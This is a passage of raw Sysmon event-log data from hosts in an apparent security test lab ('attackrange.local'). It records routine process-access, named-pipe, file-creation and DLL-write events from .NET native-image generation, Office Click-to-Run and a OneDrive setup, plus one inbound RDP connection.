icrosoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078393Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.201{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC00-607E-2D0E-00000000BB01}5804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078392Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.185{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC00-607E-2D0E-00000000BB01}5804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078391Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.185{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC00-607E-2D0E-00000000BB01}5804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078390Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078389Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078388Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078387Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078386Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078385Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078384Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078383Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000078382Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.170{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\ADMINI~1\AppData\Local\Temp\tmp7AA2.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000078381Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078380Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078379Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000078378Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.154{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\logs\setup\userTelemetryCache.otc.session-journalMD5=DA717DBD35D3A1F38E6DC0FD1D21C322,SHA256=D60479F616EDA44DE70F556EDE15D872C0BFBFCF0CC7743661A72F95E1E62766,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078377Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.154{A7A01FEF-EBFF-607E-270E-00000000BB01}6624ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\ADMINI~1\AppData\Local\Temp\tmp7AA1.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078376Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.139{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\logs\setup\userTelemetryCache.otc.session-journalMD5=54FC7535A586C290AB14173E5A482886,SHA256=487E64E7A08486A83932FABD100B458BB0AED50B8D139AC694BFE231FC05F058,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078375Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.139{A7A01FEF-EBFF-607E-270E-00000000BB01}6624ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\logs\setup\machineTelemetryCache.otc.session-journalMD5=118C1DE5EECF72F94D737F1A5A171B71,SHA256=E784E33B4225620D6ADBB96D8D6F2A6775503E8623C7B904DD249859EB37DF32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078374Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.139{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\logs\setup\userTelemetryCache.otc.session-journalMD5=D28FB4E3A09A362646FF510439190E1A,SHA256=E0EB5DB7DDC9F81C1AB86DCDAD0B35D6E1DEE750E5D91B8EA35DB79D2CA8D892,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078373Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.139{A7A01FEF-EBFF-607E-270E-00000000BB01}6624ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\logs\setup\machineTelemetryCache.otc.session-journalMD5=3982854C2C781AC093403036FD26E78D,SHA256=34CF75A80FF3AC563176FF60433D9DF9C70ABD7CBF0285A3D3D465EA2AA47B24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078372Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.123{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\logs\setup\userTelemetryCache.otc.session-journalMD5=7FE4657B8FAA7CBC0BC6C3365DA76871,SHA256=FB9E5573C4C91BC75B8C3602F7438458F68743B0FC849EDF8CA7D0B71C63122E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078371Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.123{A7A01FEF-EBFF-607E-270E-00000000BB01}6624ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\logs\setup\machineTelemetryCache.otc.session-journalMD5=7A38D063281094916467B41295DDC983,SHA256=225F8BADDDDE1E460D9A0CB31527B6F2B76395BB402438418A3B0A32F9769B18,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000078370Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078369Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078368Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078367Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000078366Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.107{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\logs\setup\userTelemetryCache.otc.session-journalMD5=4572931BA5E71590A8F1309324E815B0,SHA256=3E58BCEDB87414371A359C5862971A0DA34BA092B7ECBC779371660DE69DD6B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078365Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.107{A7A01FEF-EBFF-607E-270E-00000000BB01}6624ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\logs\setup\machineTelemetryCache.otc.session-journalMD5=2B17D5AEA8EDA112144AD87835B2E344,SHA256=049B30238CEE60657B22F92D3BCAD24BC68620F967A52DDF8536AF76F1D0DD17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078364Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.107{A7A01FEF-EBFF-607E-270E-00000000BB01}6624ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\logs\setup\machineTelemetryCache.otc.session-journalMD5=3D4F0EEAD7D07EAB377C96ABEB253ACD,SHA256=2DB991090BC23FA65EEAC73CE6856CB7201F471BF26FF5C1F227788A570F0A87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078363Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.107{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\logs\setup\userTelemetryCache.otc.session-journalMD5=B784BA5525DD69F23682FEEB22AC2ECF,SHA256=9E123F6122546B73897AAAD514E020354AB942E1C07D43CF4D3A99EF9992CECF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078362Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.092{A7A01FEF-EBFF-607E-270E-00000000BB01}6624ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\logs\setup\machineTelemetryCache.otc.session-journalMD5=C427B45FB26478121BC142B064859EEE,SHA256=3CC703C420D8E641BA6F15E32F8C3FE91C7352A1047246FEEDF5FF78F5A8B0A4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000078361Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.092{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC00-607E-2C0E-00000000BB01}5360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078360Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.076{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC00-607E-2C0E-00000000BB01}5360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078359Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.076{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC00-607E-2C0E-00000000BB01}5360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000078358Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:08.045{A7A01FEF-EBFF-607E-2B0E-00000000BB01}5084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\13dc-0\Microsoft-Windows-HomeGroupDiagnostic.NetListMgr.Interop.dll2021-04-20 14:58:08.045 354300x800000000000000050487Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:05.644{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-63484-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050486Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:08.384{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D405B74CF167E713DDBFAAA044B49BC5,SHA256=BB03C6364A30B52BE37AA8686318E3635DDEA71C67670C9ED70D87993633F425,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000078611Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:09.779{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-interlocked-l1-1-0.dll2021-04-20 14:58:09.779 11241100x800000000000000078610Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:09.717{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Qt5Qml.dll2021-04-20 14:58:09.717 11241100x800000000000000078609Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:09.717{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-crt-math-l1-1-0.dll2021-04-20 14:58:09.717 11241100x800000000000000078608Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:09.701{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-heap-l1-1-0.dll2021-04-20 14:58:09.670 18141800x800000000000000078607Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.654{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078606Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.654{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078605Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.654{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078604Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.639{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078603Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.639{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078602Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.639{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078601Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.639{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078600Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078599Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:09.545{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\vcruntime140.dll2021-04-20 14:58:09.545 18141800x800000000000000078598Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.529{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078597Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:09.514{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-handle-l1-1-0.dll2021-04-20 14:58:09.514 18141800x800000000000000078596Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078595Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078594Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:09.498{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\CollectSyncLogs.bat2021-04-20 14:58:09.498 18141800x800000000000000078593Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078592Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078591Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078590Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078589Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.420{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078588Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:09.420{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft 